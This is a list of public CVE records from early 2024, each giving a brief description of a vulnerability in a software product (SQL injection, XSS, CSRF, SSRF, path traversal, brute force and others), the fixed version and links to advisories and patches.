CVE 2024 24811 Candidate SQLAlchemyDA is a generic database adapter for ZSQL methods. A vulnerability found in versions prior to 2.2 allows unauthenticated execution of arbitrary SQL statements on the database to which the SQLAlchemyDA instance is connected. All users are affected. The problem has been patched in version 2.2. There is no workaround for the problem. MISC:https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a | URL:https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a | MISC:https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw | URL:https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw Assigned (20240131)
CVE 2024 24810 Candidate WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. The .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges. This impacts any installer built with the WiX installer framework. This issue has been patched in version 4.0.4. MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5 | URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5 Assigned (20240131)
CVE 2024 2481 Candidate A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0. Affected is an unknown function of the file /admin/manage-students.php. The manipulation of the argument del leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256890 is the identifier assigned to this vulnerability. MISC:VDB-256890 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256890 | MISC:VDB-256890 | Surya2Developer Hostel Management System manage-students.php access control | URL:https://vuldb.com/?id.256890 | MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Broken_Access_Control%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md | URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Broken_Access_Control%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md Assigned (20240315)
CVE 2024 24808 Candidate pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451. MISC:https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd | URL:https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd | MISC:https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5 | URL:https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5 Assigned (20240131)
CVE 2024 24807 Candidate Sulu is a highly extensible open-source PHP content management system based on the Symfony framework. There is an issue when inputting HTML into the Tag name. The HTML is executed when the tag name is listed in the auto complete form. Only admin users can create tags so they are the only ones affected. The problem is patched with version(s) 2.4.16 and 2.5.12. MISC:https://github.com/sulu/sulu/releases/tag/2.4.16 | URL:https://github.com/sulu/sulu/releases/tag/2.4.16 | MISC:https://github.com/sulu/sulu/releases/tag/2.5.12 | URL:https://github.com/sulu/sulu/releases/tag/2.5.12 | MISC:https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv | URL:https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv Assigned (20240131)
CVE 2024 24806 Candidate libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/libuv/libuv/commit/0f2d7e784a256b54b2385043438848047bc2a629 | URL:https://github.com/libuv/libuv/commit/0f2d7e784a256b54b2385043438848047bc2a629 | MISC:https://github.com/libuv/libuv/commit/3530bcc30350d4a6ccf35d2f7b33e23292b9de70 | URL:https://github.com/libuv/libuv/commit/3530bcc30350d4a6ccf35d2f7b33e23292b9de70 | MISC:https://github.com/libuv/libuv/commit/c858a147643de38a09dd4164758ae5b685f2b488 | URL:https://github.com/libuv/libuv/commit/c858a147643de38a09dd4164758ae5b685f2b488 | MISC:https://github.com/libuv/libuv/commit/e0327e1d508b8207c9150b6e582f0adf26213c39 | URL:https://github.com/libuv/libuv/commit/e0327e1d508b8207c9150b6e582f0adf26213c39 | MISC:https://github.com/libuv/libuv/security/advisories/GHSA-f74f-cvh7-c6q6 | URL:https://github.com/libuv/libuv/security/advisories/GHSA-f74f-cvh7-c6q6 | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3752-1] libuv1 security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00005.html | MLIST:[oss-security] 20240208 libuv 1.48.0 released, fixes CVE-2024-24806 | URL:http://www.openwall.com/lists/oss-security/2024/02/08/2 | MLIST:[oss-security] 20240211 Re: libuv 1.48.0 released, fixes CVE-2024-24806 | URL:http://www.openwall.com/lists/oss-security/2024/02/11/1 Assigned (20240131)
CVE 2024 24805 Candidate Missing Authorization vulnerability in Deepak anand WP Dummy Content Generator.This issue affects WP Dummy Content Generator: from n/a through 3.1.2. MISC:https://patchstack.com/database/vulnerability/wp-dummy-content-generator/wordpress-wp-dummy-content-generator-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-dummy-content-generator/wordpress-wp-dummy-content-generator-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24804 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in websoudan MW WP Form allows Stored XSS.This issue affects MW WP Form: from n/a through 5.0.6. MISC:https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24803 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPoperation Ultra Companion – Companion plugin for WPoperation Themes allows Stored XSS.This issue affects Ultra Companion – Companion plugin for WPoperation Themes: from n/a through 1.1.9. MISC:https://patchstack.com/database/vulnerability/ultra-companion/wordpress-ultra-companion-plugin-1-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ultra-companion/wordpress-ultra-companion-plugin-1-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24802 Candidate Cross-Site Request Forgery (CSRF) vulnerability in John Tendik JTRT Responsive Tables.This issue affects JTRT Responsive Tables: from n/a through 4.1.9. MISC:https://patchstack.com/database/vulnerability/jtrt-responsive-tables/wordpress-jtrt-responsive-tables-plugin-4-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/jtrt-responsive-tables/wordpress-jtrt-responsive-tables-plugin-4-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24801 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel – WordPress Owl Carousel Slider allows Stored XSS.This issue affects OWL Carousel – WordPress Owl Carousel Slider: from n/a through 1.4.0. MISC:https://patchstack.com/database/vulnerability/lgx-owl-carousel/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/lgx-owl-carousel/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 2480 Candidate A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0. This vulnerability affects unknown code of the component Executa Page. The manipulation of the argument Companhia/Planta/Agente de/Agente até leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256888. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256888 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256888 | MISC:VDB-256888 | MHA Sistemas arMHAzena Executa Page sql injection | URL:https://vuldb.com/?id.256888 | MISC:https://johnermac.github.io/cve/sqli/ | URL:https://johnermac.github.io/cve/sqli/ Assigned (20240315)
CVE 2024 24799 Candidate Missing Authorization vulnerability in WooCommerce WooCommerce Box Office.This issue affects WooCommerce Box Office: from n/a through 1.2.2. MISC:https://patchstack.com/database/vulnerability/woocommerce-box-office/wordpress-woocommerce-box-office-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woocommerce-box-office/wordpress-woocommerce-box-office-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24798 Candidate Cross-Site Request Forgery (CSRF) vulnerability in SoniNow Team Debug.This issue affects Debug: from n/a through 1.10. MISC:https://patchstack.com/database/vulnerability/debug/wordpress-debug-plugin-1-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/debug/wordpress-debug-plugin-1-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24797 Candidate Deserialization of Untrusted Data vulnerability in G5Theme ERE Recently Viewed – Essential Real Estate Add-On.This issue affects ERE Recently Viewed – Essential Real Estate Add-On: from n/a through 1.3. MISC:https://patchstack.com/database/vulnerability/ere-recently-viewed/wordpress-ere-recently-viewed-plugin-1-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ere-recently-viewed/wordpress-ere-recently-viewed-plugin-1-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24796 Candidate Deserialization of Untrusted Data vulnerability in MagePeople Team Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin.This issue affects Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin: from n/a through 4.1.1. MISC:https://patchstack.com/database/vulnerability/mage-eventpress/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mage-eventpress/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24794 Candidate A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image.The Use-After-Free happens in the `parse_meta_sequence_end()` parsing the Sequence Value Represenations. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931 Assigned (20240130)
CVE 2024 24793 Candidate A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image.The Use-After-Free happens in the `parse_meta_element_create()` parsing the elements in the File Meta Information header. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931 Assigned (20240130)
CVE 2024 2479 Candidate A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0. This affects an unknown part of the component Cadastro Page. The manipulation of the argument Query leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256887. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256887 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256887 | MISC:VDB-256887 | MHA Sistemas arMHAzena Cadastro Page cross site scripting | URL:https://vuldb.com/?id.256887 | MISC:https://johnermac.github.io/cve/xss/ | URL:https://johnermac.github.io/cve/xss/ Assigned (20240315)
CVE 2024 24786 Candidate The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set. FEDORA:FEDORA-2024-5bae6c0ea7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/ | MISC:https://go.dev/cl/569356 | URL:https://go.dev/cl/569356 | MISC:https://pkg.go.dev/vuln/GO-2024-2611 | URL:https://pkg.go.dev/vuln/GO-2024-2611 Assigned (20240130)
CVE 2024 24785 Candidate If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates. MISC:https://go.dev/cl/564196 | URL:https://go.dev/cl/564196 | MISC:https://go.dev/issue/65697 | URL:https://go.dev/issue/65697 | MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | MISC:https://pkg.go.dev/vuln/GO-2024-2610 | URL:https://pkg.go.dev/vuln/GO-2024-2610 Assigned (20240130)
CVE 2024 24784 Candidate The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers. MISC:https://go.dev/cl/555596 | URL:https://go.dev/cl/555596 | MISC:https://go.dev/issue/65083 | URL:https://go.dev/issue/65083 | MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | MISC:https://pkg.go.dev/vuln/GO-2024-2609 | URL:https://pkg.go.dev/vuln/GO-2024-2609 Assigned (20240130)
CVE 2024 24783 Candidate Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates. MISC:https://go.dev/cl/569339 | URL:https://go.dev/cl/569339 | MISC:https://go.dev/issue/65390 | URL:https://go.dev/issue/65390 | MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg | MISC:https://pkg.go.dev/vuln/GO-2024-2598 | URL:https://pkg.go.dev/vuln/GO-2024-2598 Assigned (20240130)
CVE 2024 24782 Candidate An unauthenticated attacker can send a ping request from one network to another through an error in the origin verification even though the ports are separated by VLAN. MISC:https://cert.vde.com/en/advisories/VDE-2024-013 | URL:https://cert.vde.com/en/advisories/VDE-2024-013 Assigned (20240130)
CVE 2024 24781 Candidate An unauthenticated remote attacker can use an uncontrolled resource consumption vulnerability to DoS the affected devices through excessive traffic on a single ethernet port. MISC:https://cert.vde.com/en/advisories/VDE-2024-013 | URL:https://cert.vde.com/en/advisories/VDE-2024-013 Assigned (20240130)
CVE 2024 2478 Candidate A vulnerability was found in BradWenqiang HR 2.0. It has been rated as critical. Affected by this issue is the function selectAll of the file /bishe/register of the component Background Management. The manipulation of the argument userName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256886 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256886 | BradWenqiang HR Background Management register selectAll sql injection | URL:https://vuldb.com/?id.256886 | MISC:VDB-256886 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256886 | MISC:https://github.com/zuizui35/cve/blob/main/cve.md | URL:https://github.com/zuizui35/cve/blob/main/cve.md Assigned (20240315)
CVE 2024 24779 Candidate Apache Superset with custom roles that include `can write on dataset` and without all data access permissions, allows for users to create virtual datasets to data they don't have access to. These users could then use those virtual datasets to get access to unauthorized data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue. MISC:https://lists.apache.org/thread/xzhz1m5bb9zxhyqgoy4q2d689b3zp4pq | URL:https://lists.apache.org/thread/xzhz1m5bb9zxhyqgoy4q2d689b3zp4pq | MLIST:[oss-security] 20240228 CVE-2024-24779: Apache Superset: Improper data authorization when creating a new dataset | URL:http://www.openwall.com/lists/oss-security/2024/02/28/6 Assigned (20240130)
CVE 2024 24776 Candidate Mattermost fails to check the required permissions in the POST /api/v4/channels/stats/member_count API resulting in channel member counts being leaked to a user without permissions. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240130)
CVE 2024 24775 Candidate When a virtual server is enabled with VLAN group and SNAT listener is configured, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137333 | URL:https://my.f5.com/manage/s/article/K000137333 Assigned (20240201)
CVE 2024 24774 Candidate Mattermost Jira Plugin handling subscriptions fails to check the security level of an incoming issue or limit it based on the user who created the subscription resulting in registered users on Jira being able to create webhooks that give them access to all Jira issues. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240130)
CVE 2024 24773 Candidate Improper parsing of nested SQL statements on SQLLab would allow authenticated users to surpass their data authorization scope. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue. MISC:https://lists.apache.org/thread/h66fy6nj41cfx07zh7l552w6dmtjh501 | URL:https://lists.apache.org/thread/h66fy6nj41cfx07zh7l552w6dmtjh501 | MLIST:[oss-security] 20240228 CVE-2024-24773: Apache Superset: Improper validation of SQL statements allows for unauthorized access to data | URL:http://www.openwall.com/lists/oss-security/2024/02/28/4 Assigned (20240130)
CVE 2024 24772 Candidate A guest user could exploit a chart data REST API and send arbitrary SQL statements that on error could leak information from the underlying analytics database.This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue. MISC:https://lists.apache.org/thread/gfl3ckwy6y9tpz9jmpv62orh2q346sn5 | URL:https://lists.apache.org/thread/gfl3ckwy6y9tpz9jmpv62orh2q346sn5 | MLIST:[oss-security] 20240228 CVE-2024-24772: Apache Superset: Improper Neutralisation of custom SQL on embedded context | URL:http://www.openwall.com/lists/oss-security/2024/02/28/5 Assigned (20240130)
CVE 2024 24771 Candidate Open Forms allows users create and publish smart forms. Versions prior to 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain a non-exploitable multi-factor authentication weakness. Superusers who have their credentials (username + password) compromised could potentially have the second-factor authentication bypassed if an attacker somehow managed to authenticate to Open Forms. The maintainers of Open Forms do not believe it is or has been possible to perform this login. However, if this were possible, the victim's account may be abused to view (potentially sensitive) submission data or have been used to impersonate other staff accounts to view and/or modify data. Three mitigating factors to help prevent exploitation include: the usual login page (at `/admin/login/`) does not fully log in the user until the second factor was succesfully provided; the additional non-MFA protected login page at `/api/v2/api-authlogin/` was misconfigured and could not be used to log in; and there are no additional ways to log in. This also requires credentials of a superuser to be compromised to be exploitable. Versions 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain the following patches to address these weaknesses: Move and only enable the API auth endpoints (`/api/v2/api-auth/login/`) with `settings.DEBUG = True`. `settings.DEBUG = True` is insecure and should never be applied in production settings. Additionally, apply a custom permission check to the hijack flow to only allow second-factor-verified superusers to perform user hijacking. MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.2.9 | URL:https://github.com/open-formulieren/open-forms/releases/tag/2.2.9 | MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.3.7 | URL:https://github.com/open-formulieren/open-forms/releases/tag/2.3.7 | MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.4.5 | URL:https://github.com/open-formulieren/open-forms/releases/tag/2.4.5 | MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.5.2 | URL:https://github.com/open-formulieren/open-forms/releases/tag/2.5.2 | MISC:https://github.com/open-formulieren/open-forms/security/advisories/GHSA-64r3-x3gf-vp63 | URL:https://github.com/open-formulieren/open-forms/security/advisories/GHSA-64r3-x3gf-vp63 Assigned (20240129)
CVE 2024 24770 Candidate vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. Much like GHSA-45gq-q4xh-cp53, it is possible to find which usernames exist in vantage6 by calling the API routes `/recover/lost` and `/2fa/lost`. These routes send emails to users if they have lost their password or MFA token. This issue has been addressed in commit `aecfd6d0e` and is expected to ship in subsequent releases. Users are advised to upgrade as soon as a new release is available. There are no known workarounds for this vulnerability. MISC:https://github.com/vantage6/vantage6/commit/aecfd6d0e83165a41a60ebd52d2287b0217be26b | URL:https://github.com/vantage6/vantage6/commit/aecfd6d0e83165a41a60ebd52d2287b0217be26b | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53 | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53 | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-5h3x-6gwf-73jm | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-5h3x-6gwf-73jm Assigned (20240129)
CVE 2024 24768 Candidate 1Panel is an open source Linux server operation and maintenance management panel. The HTTPS cookie that comes with the panel does not have the Secure keyword, which may cause the cookie to be sent in plain text if accessed using HTTP. This issue has been patched in version 1.9.6. MISC:https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5 | URL:https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5 | MISC:https://github.com/1Panel-dev/1Panel/pull/3817 | URL:https://github.com/1Panel-dev/1Panel/pull/3817 | MISC:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h | URL:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h Assigned (20240129)
CVE 2024 24767 Candidate CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, CasaOS doesn't defend against password brute force attacks, which leads to having full access to the server. The web application lacks control over the login attempts. This vulnerability allows attackers to get super user-level access over the server. Version 0.4.7 contains a patch for this issue. MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/62006f61b55951048dbace4ebd9e483274838699 | URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/62006f61b55951048dbace4ebd9e483274838699 | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c69x-5xmw-v44x | URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c69x-5xmw-v44x Assigned (20240129)
CVE 2024 24766 Candidate CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, the Casa OS Login page disclosed the username enumeration vulnerability in the login page. An attacker can enumerate the CasaOS username using the application response. If the username is incorrect application gives the error `**User does not exist**`. If the password is incorrect application gives the error `**Invalid password**`. Version 0.4.7 fixes this issue. MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/c75063d7ca5800948e9c09c0a6efe9809b5d39f7 | URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/c75063d7ca5800948e9c09c0a6efe9809b5d39f7 | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c967-2652-gfjm | URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c967-2652-gfjm Assigned (20240129)
CVE 2024 24765 Candidate CasaOS-UserService provides user management functionalities to CasaOS. Prior to version 0.4.7, path filtering of the URL for user avatar image files was not strict, making it possible to get any file on the system. This could allow an unauthorized actor to access, for example, the CasaOS user database, and possibly obtain system root privileges. Version 0.4.7 fixes this issue. MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/3f4558e23c0a9958f9a0e20aabc64aa8fd51840e | URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/3f4558e23c0a9958f9a0e20aabc64aa8fd51840e | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7 | MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-h5gf-cmm8-cg7c | URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-h5gf-cmm8-cg7c Assigned (20240129)
CVE 2024 24763 Candidate JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available. MISC:https://github.com/jumpserver/jumpserver/releases/tag/v3.10.0 | URL:https://github.com/jumpserver/jumpserver/releases/tag/v3.10.0 | MISC:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5 | URL:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5 Assigned (20240129)
CVE 2024 24762 Candidate `python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7. MISC:https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4 | URL:https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4 | MISC:https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p | URL:https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p | MISC:https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74 | URL:https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74 | MISC:https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5 | URL:https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5 | MISC:https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238 | URL:https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238 | MISC:https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc | URL:https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc | MISC:https://github.com/tiangolo/fastapi/releases/tag/0.109.1 | URL:https://github.com/tiangolo/fastapi/releases/tag/0.109.1 | MISC:https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389 | URL:https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389 Assigned (20240129)
CVE 2024 24761 Candidate Galette is a membership management web application for non profit organizations. Starting in version 1.0.0 and prior to version 1.0.2, public pages are per default restricted to only administrators and staff members. From configuration, it is possible to restrict to up-to-date members or to everyone. Version 1.0.2 fixes this issue. MISC:https://github.com/galette/galette/commit/a5c18bb9819b8da1b3ef58f3e79577083c657fbb | URL:https://github.com/galette/galette/commit/a5c18bb9819b8da1b3ef58f3e79577083c657fbb | MISC:https://github.com/galette/galette/security/advisories/GHSA-jrqg-mpwv-pxpv | URL:https://github.com/galette/galette/security/advisories/GHSA-jrqg-mpwv-pxpv Assigned (20240129)
CVE 2024 24760 Candidate mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`. MISC:https://github.com/mailcow/mailcow-dockerized/commit/087481ac12bfa5dd715f3630f0b1697be94f7e88 | URL:https://github.com/mailcow/mailcow-dockerized/commit/087481ac12bfa5dd715f3630f0b1697be94f7e88 | MISC:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6 | URL:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6 Assigned (20240129)
